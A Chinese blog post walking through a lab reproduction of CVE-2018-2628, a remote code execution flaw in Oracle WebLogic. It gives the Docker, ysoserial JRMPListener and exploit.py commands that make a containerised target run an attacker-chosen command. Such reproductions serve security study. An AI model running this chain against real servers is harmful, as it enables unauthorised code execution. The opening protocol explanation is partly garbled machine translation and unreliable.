0.先提幾個(gè)概念

JRMP:java remote method protocol，Java遠(yuǎn)程方法協(xié)議
JRMP是的Java技術(shù)協(xié)議的具體對(duì)象為希望和遠(yuǎn)程引用。JRMP只能是一個(gè)Java特有的,基于流的協(xié)議。相對(duì)于的RMI - IIOP的 ，該協(xié)議JRMP只能是一個(gè)對(duì)象的Java到Java的遠(yuǎn)程調(diào)用，這使得它依賴語(yǔ)言，意思是客戶端和服務(wù)器必須使用Java。
JRMP:Java遠(yuǎn)程消息交換協(xié)議JRMP（Java Remote Messaging Protocol）
該協(xié)議基于TCP/IP，既然是作為信息交換協(xié)議，必然存在接收和發(fā)送兩個(gè)端點(diǎn)，JRMPListener可以粗糙的理解為發(fā)送端，在本實(shí)驗(yàn)中意為攻擊機(jī)上1099端口與weblogic靶機(jī)上的7001進(jìn)行通信達(dá)到遠(yuǎn)程命令執(zhí)行的目的。

1.安裝靶機(jī)環(huán)境

docker pull zhiqzhao/ubuntu_weblogic1036_domain docker run -d -p 7001:7001 zhiqzhao/ubuntu_weblogic1036_domain

#這里直接使用大佬配置好的環(huán)境

2.在JRMPListener主機(jī)上運(yùn)行命令

這里采用的是Ubuntu16.04+docker，docker容器作為weblogic靶機(jī)，在此JRMPListener主機(jī)指的是Ubuntu16.04。

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/sss666.txt' #'touch /tmp/sss666.txt'為我想執(zhí)行的命令，1099是JRMP Server監(jiān)聽(tīng)的端口。

圖中的172.17.0.2的ip為docker靶機(jī)的ip
3.運(yùn)行exploit腳本

python exploit.py 172.17.0.2 7001 ../ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.185.43.215 1099 JRMPClien #172.17.0.2 7001是weblogic靶機(jī)的IP和端口 #../ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 是ysoserial的本地路徑根據(jù)自己真實(shí)路徑填寫(xiě) #10.185.43.215 1099的JRMP 一端的IP地址和端口 #JRMPClien是執(zhí)行JRMPClient的類

4.進(jìn)入docker靶機(jī)查看文件是否創(chuàng)建成功

docker exec -ti determined_stonebrak /bin/bash #determined_stonebrak是我的docker靶機(jī)的名字，每個(gè)人創(chuàng)建的名字都不一樣可使用docker ps查看NAME ls /tmp/

總結(jié)

以上是生活随笔為你收集整理的weblogic(CVE-2018-2628漏洞复现)的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。